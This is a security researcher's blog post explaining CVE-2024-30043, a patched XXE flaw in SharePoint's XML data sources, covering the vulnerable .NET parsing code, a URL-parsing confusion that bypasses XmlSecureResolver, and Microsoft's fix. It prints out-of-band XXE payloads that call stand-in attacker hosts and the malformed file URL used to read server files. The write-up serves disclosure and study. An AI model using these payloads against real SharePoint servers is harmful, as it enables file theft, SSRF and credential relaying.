CVE-2024-30043: ABUSING URL PARSING CONFUSION TO EXPLOIT XXE ON SHAREPOINT SERVER AND CLOUD

Original text by Piotr Bazydło

Yes, the title is right. This blog covers an XML eXternal Entity (XXE) injection vulnerability that I found in SharePoint. The bug was recently patched by Microsoft. In general, XXE vulnerabilities are not very exciting in terms of discovery and related technical aspects. They may sometimes be fun to exploit and exfiltrate data (or do other nasty things) in real environments, but in the vulnerability research world, you typically find them, report them, and forget about them.

So why am I writing a blog post about an XXE? I have two reasons:

·       It affects SharePoint, both on-prem and cloud instances, which is a nice target. This vulnerability can be exploited by a low-privileged user.
·       This is one of the craziest XXEs that I have ever seen (and found), both in terms of vulnerability discovery and the method of triggering. When we talk about overall exploitation and impact, this Pwn2Own win by Chris Anastasio and Steven Seeley is still my favorite.

The vulnerability is known as CVE-2024-30043, and, as one would expect with an XXE, it allows you to:

·       Read files with SharePoint Farm Service account permission.
·       Perform Server-side request forgery (SSRF) attacks.
·       Perform NTLM Relaying.
·       Achieve any other side effects to which XXE may lead.

Let us go straight to the details.

BaseXmlDataSource DataSource

Microsoft.SharePoint.WebControls.BaseXmlDataSource
 is an abstract base class, inheriting from 
DataSource
, for data source objects that can be added to a SharePoint Page. DataSource can be included in a SharePoint page, in order to retrieve data (in a way specific to a particular DataSource). When a 
BaseXmlDataSource
 is present on a page, its 
Execute
 method will be called at some point during page rendering:

protected XmlDocument Execute(string request) // [1]
{
    SPSite spsite = null;
    try
    {
        if (!BaseXmlDataSource.GetAdminSettings(out spsite).DataSourceControlEnabled)
        {
            throw new DataSourceControlDisabledException(SPResource.GetString("DataSourceControlDisabled", new object[0]));
        }
        string text = this.FetchData(request); // [2]
        if (text != null && text.Length > 0)
        {
            XmlReaderSettings xmlReaderSettings = new XmlReaderSettings();
            xmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit; // [3]
            XmlTextReader xmlTextReader = new XmlTextReader(new StringReader(text));
            XmlSecureResolver xmlResolver = new XmlSecureResolver(new XmlUrlResolver(), request); // [4]
            xmlTextReader.XmlResolver = xmlResolver; // [5]
            XmlReader xmlReader = XmlReader.Create(xmlTextReader, xmlReaderSettings); // [6]
            try
            {
                do
                {
                    xmlReader.Read(); // [7]
                }
                while (xmlReader.NodeType != XmlNodeType.Element);
            }
            ...
        }
        ...
    }
    ...
}

At 

[1]
, you can see the 
Execute
 method, which accepts a string called 
request
. We fully control this string, and it should be a URL (or a path) pointing to an XML file. Later, I will refer to this string as 
DataFile
.

At this point, we can derive this method into two main parts: XML fetching and XML parsing.

       a) XML Fetching

At 

[2]
this.FetchData
 is called and our URL is passed as an input argument. 
BaseXmlDataSource
 does not implement this method (it’s an abstract class). 

FetchData
 is implemented in three classes that extend our abstract class:
• 
SoapDataSource
 — performs HTTP SOAP request and retrieves a response (XML).
• 
XmlUrlDataSource
 — performs a customizable HTTP request and retrieves a response (XML).
• 
SPXmlDataSource
 — retrieves an existing specified file on the SharePoint site. 

We will revisit those classes later.

       b) XML Parsing

At 

[3]
, the 
xmlReaderSettings.DtdProcessing
 member is set to 
DtdProcessing.Prohibit
, which should disable the processing of DTDs. 

At 

[4]
 and 
[5]
, the 
xmlTextReader.XmlResolver
 is set to a freshly created 
XmlSecureResolver
. The 
request
 string, which we fully control, is passed as the 
securityUrl
 parameter when creating the 
XmlSecureResolver

At 

[6]
, the code creates a new instance of 
XmlReader
.

Finally, it reads the contents of the XML using a while-do loop at 

[7]
.

At first glance, this parsing routine seems correct. The document type definition (DTD) processing of our 

XmlReaderSettings
 instance is set to 
Prohibit
, which should block all DTD processing. On the other hand, we have the 
XmlResolver
 set to 
XmlSecureResolver
.

From my experience, it is very rare to see .NET code, where:
• DTDs are blocked through 

XmlReaderSettings
.
• Some 
XmlResolver
 is still defined. 

I decided to play around and sent in a general entity-based payload at some test code I wrote similar to the code shown above (I only replaced 

XmlSecureResolver
 with 
XmlUrlResolver
 for testing purposes):

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY b SYSTEM "http://attacker/poc.txt">
]>
<r>&b;</r>

As expected, no HTTP request was performed, and a DTD processing exception was thrown. What about this payload?

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY % sp SYSTEM "http://attacker/poc.xml">
%sp;
]>
<a>wat</a>

It was a massive surprise to me, but the HTTP request was performed! According to that, it seems that when you have .NET code where:
• 

XmlReader
 is used with 
XmlTextReader
 and 
XmlReaderSettings
.
• 
XmlReaderSettings.DtdProcessing
 is set to 
Prohibit
.
• An 
XmlTextReader.XmlResolver
 is set.

The resolver will first try to handle the parameter entities, and only afterwards will perform the DTD prohibition check! An exception will be thrown in the end, but it still allows you to exploit the Out-of-Band XXE and potentially exfiltrate data (using, for example, an HTTP channel).

The XXE is there, but we have to solve two mysteries:

• How can we properly fetch the XML payload in SharePoint?
• What’s the deal with this 

XmlSecureResolver
?

XML Fetching and XmlSecureResolver

As I have already mentioned, there are 3 classes that extend our vulnerable 

BaseXmlDataSource
. Their 
FetchData
 method is used to retrieve the XML content based on our URL. Then, this XML will be parsed with the vulnerable XML parsing code.

Let’s summarize those 3 classes:

       a) 

XmlUrlDataSource

       • Accepts URLs with a protocol set to either 

http
 or 
https
.
       • Performs an HTTP request to fetch the XML content. This request is customizable. For example, we can select which HTTP method we want to use.
       • Some SSRF protections are implemented. This class won’t allow you to make HTTP requests to local addresses such as 127.0.0.1 or 192.168.1.10. Still, you can use it freely to reach external IP address space. 

       b) 

SoapDataSource

       • Almost identical to the first one, although it allows you to perform SOAP requests only (body must contain valid XML, plus additional restrictions).
       • The same SSRF protections exist as in 

XmlUrlDataSource
.

       c) 

SPXmlDataSource

       • Allows retrieval of the contents of SharePoint pages or documents. If you have a file 

test.xml
 uploaded to the 
sample
 site, you can provide a URL as follows: 
/sites/sample/test.xml
.

At this point, those HTTP-based classes look like a great match. We can:
• Create an HTTP server.
• Fetch malicious XML from our server.
• Trigger XXE and potentially read files from SharePoint server. 

Let’s test this. I’m creating an 

XmlUrlDataSource
, and I want it to fetch the XML from this URL:

       

http://attacker.com/poc.xml

poc.xml
 contains the following payload:

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY % sp SYSTEM "http://localhost/test">
%sp;
]>

The plan is simple. I want to test the XXE by executing an HTTP request to the localhost (SSRF). 

We must also remember that whatever URL that we specify as our source also becomes the 

securityUrl
 of the 
XmlSecureResolver
. Accordingly, this is what will be executed:

Figure 1 XmlSecureResolver initialization

Who cares anyway? YOLO and let’s move along with the exploitation. Unfortunately, this is the exception that appears when we try to execute this attack:

The action that failed was:
Demand
The type of the first permission that failed was:
System.Net. WebPermission
The first permission that failed was: <IPermission class="System.Net.WebPermission, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" version="1">
<ConnectAccess>
‹URI uri="http://localhost/test"/>
</ConnectAccess>
</IPermission>

Figure 2 Exception thrown during XXE->SSRF

It seems that “Secure” in 

XmlSecureResolver
 stands for something. In general, it is a wrapper around various resolvers, which allows you to apply some resource fetching restrictions. Here is a fragment of the Microsoft documentation:

“Helps to secure another implementation of XmlResolver by wrapping the XmlResolver object and restricting the resources that the underlying XmlResolver has access to.”

In general, it is based on Microsoft Code Access Security. Depending on the provided URL, it creates some resource access rules. Let’s see a simplified example for the 

http://attacker.com/test.xml
:

Figure 3 Simplified sample restrictions applied by XmlSecureResolver

In short, it creates restrictions based on protocol, hostname, and a couple of different things (like an optional port, which is not applicable to all protocols). If we fetch our XML from 

http://attacker.com
, we won’t be able to make a request to 
http://localhost
because the host does not match.

The same goes for the protocol. If we fetch XML from the attacker’s HTTP server, we won’t be able to access local files with XXE, because neither the protocol (

http://
 versus 
file://
) nor the host match as required.

To summarize, this XXE is useless so far. Even though we can technically trigger the XXE, it only allows us to reach our own server, which we can also achieve with the intended functionalities of our SharePoint sources (such as 

XmlDataSource
). We need to figure out something else.

SPXmlDataSource and URL Parsing Issues

At this point, I was not able to abuse the HTTP-based sources. I tried to use 

SPXmlDataSource
 with the following 
request
:

       

/sites/mysite/test.xml

The idea is simple. We are a SharePoint user, and we can upload files to some sites. We upload our malicious XML to the 

http://sharepoint/sites/mysite/test.xml
document and then we:
       • Create 
SPXmlDataSource

       • Set 
DataFile
 to 
/sites/mysite/test.xml
.

SPXmlDataSource
 will successfully retrieve our XML. What about 
XmlSecureResolver
? Unfortunately, such a path (without a protocol) will lead to a very restrictive policy, which does not allow us to leverage this XXE.

It made me wonder about the URL parsing. I knew that I could not abuse HTTP-based 

XmlDataSource
 and 
SoapDataSource
. The code was written in C# and it was pretty straightforward to read – URL parsing looked good there. On the other hand, the URL parsing of 
SPXmlDataSource
 is performed by some unmanaged code, which cannot be easily decompiled and read. 

I started thinking about a following potential exploitation scenario:
       • Delivering a “malformed” URL.
       • 

SPXmlDataSource
 somehow manages to handle this URL, and retrieves my uploaded XML successfully.
       • The URL gives me an unrestricted 
XmlSecureResolver
 policy and I’m able to fully exploit XXE.

This idea seemed good, and I decided to investigate the possibilities. First, we have to figure out when 

XmlSecureResolver
 gives us a nice policy, which allows us to:
       • Access a local file system (to read file contents).
       • Perform HTTP communication to any server (to exfiltrate data).

Let’s deliver the following URL to 

XmlSecureResolver
:

       

file://localhost/c$/whatever

Bingo! 

XmlSecureResolver
 creates a policy with no restrictions! It thinks that we are loading the XML from the local file system, which means that we probably already have full access, and we can do anything we want.

Such a URL is not something that we should be able to deliver to 

SPXmlDataSource
 or any other data source that we have available. None of them is based on the local file system, and even if they were, we are not able to upload files there.

Still, we don’t know how 

SPXmlDataSource
 is handling URLs. Maybe my dream attack scenario with a malformed URL is possible? Before even trying to reverse the appropriate function, I started playing around with this SharePoint data source, and surprisingly, I found a solution quickly:

       

file://localhost\c$/sites/mysite/test.xml

Let’s see how 

SPXmlDataSource
 handles it (based on my observations):

Figure 4 SPXmlDataSource — handling of malformed URL

This is awesome. Such a URL allows us to retrieve the XML that we can freely upload to SharePoint. On the other hand, it gives us an unrestricted access policy in 

XmlSecureResolver
! This URL parsing confusion between those two components gives us the possibility to fully exploit the XXE and perform a file read.

The entire attack scenario looks like this:

Figure 5 SharePoint XXE — entire exploitation scenario

Demo

Let’s have a look at the demo, to visualize things better. It presents the full exploitation process, together with the debugger attached. You can see that:
       • 

SPXmlDataSource
 fetches the malicious XML file, even though the URL is malformed.
       • 
XmlSecureResolver
 creates an unrestricted access policy.
       • XXE is exploited and we retrieve the 
win.ini
 file.
       • “DTD prohibited” exception is eventually thrown, but we were still able to abuse the OOB XXE.

The Patch

The patch from Microsoft implemented two main changes:
       • More URL parsing controls for 

SPXmlDataSource
.
       • 
XmlTextReader
 object also prohibits DTD usage (previously, only 
XmlReaderSettings
 did that).

In general, I find .NET XXE-protection settings way trickier than the ones that you can define in various Java parsers. This is because you can apply them to objects of different types (here: 

XmlReaderSettings
 versus 
XmlTextReader
). When 
XmlTextReader
prohibits the DTD usage, parameter entities seem to never be resolved, even with the resolver specified (that’s how this patch works). On the other hand, when 
XmlReaderSettings
 prohibits DTDs, parameter entities are resolved when the 
XmlUrlResolver
 is used. You can easily get confused here.

Summary

A lot of us thought that XXE vulnerabilities were almost dead in .NET. Still, it seems that you may sometimes spot some tricky implementations and corner cases that may turn out to be vulnerable. A careful review of .NET XXE-related settings is not an easy task (they are tricky) but may eventually be worth a shot.

I hope you liked this writeup. I have a huge line of upcoming blog posts, but vulnerabilities are waiting for the patches (including one more SharePoint vulnerability). Until my next post, you can follow me @chudypb and follow the team on TwitterMastodonLinkedIn, or Instagramfor the latest in exploit techniques and security patches.